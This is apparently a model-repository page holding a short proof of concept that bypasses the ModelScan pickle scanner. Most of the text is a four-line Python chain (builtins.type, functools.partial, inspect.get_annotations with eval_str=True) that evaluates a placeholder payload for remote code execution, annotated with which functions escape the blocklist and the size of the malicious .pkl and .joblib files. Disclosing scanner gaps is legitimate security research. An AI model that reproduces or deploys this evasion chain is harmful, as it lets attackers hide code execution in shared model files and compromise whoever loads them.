ModelScan Bypass PoC: inspect.get_annotations() + functools.partial() + builtins.type()
This bypass uses a 4-step chain of completely unblocked standard library functions:
ns = {"__annotations__": {"x": PAYLOAD}}
cls = builtins.type("X", (), ns) # type โ blocklist โ
p = functools.partial(get_annotations, eval_str=True) # functools, inspect โ blocklist โ
p(cls) # โ eval(PAYLOAD) โ REMOTE CODE EXECUTION
Size: 214 bytes (.pkl) / 235 bytes (.joblib)
Inference Providers NEW
This model isn't deployed by any Inference Provider. ๐ Ask for provider support